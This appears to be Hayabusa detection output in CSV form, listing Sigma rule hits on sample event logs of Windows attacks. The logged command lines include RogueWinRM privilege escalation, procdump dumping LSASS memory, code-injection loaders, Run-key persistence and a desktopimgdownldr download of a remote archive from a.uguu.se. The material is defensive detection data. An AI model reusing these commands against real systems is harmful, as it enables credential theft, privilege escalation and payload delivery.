2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: RogueWinRM.exe -p c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 1516 | PGUID: 747F3D96-CA4E-5EC9-0000-00109FE23700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:50.330 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 3044 | PGUID: 747F3D96-CA4C-5EC9-0000-001093D53700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49680 (MSEDGEWIN10) | Dst: 127.0.0.1:5985 (MSEDGEWIN10) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe | PID: 3960 | PGUID: 747F3D96-CA4B-5EC9-0000-0010B8CB3700,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: c:\Windows\System32\cmd.exe | LID: 0x3e7 | PID: 4456 | PGUID: 747F3D96-CA52-5EC9-0000-001027FA3700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,CredAccess,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
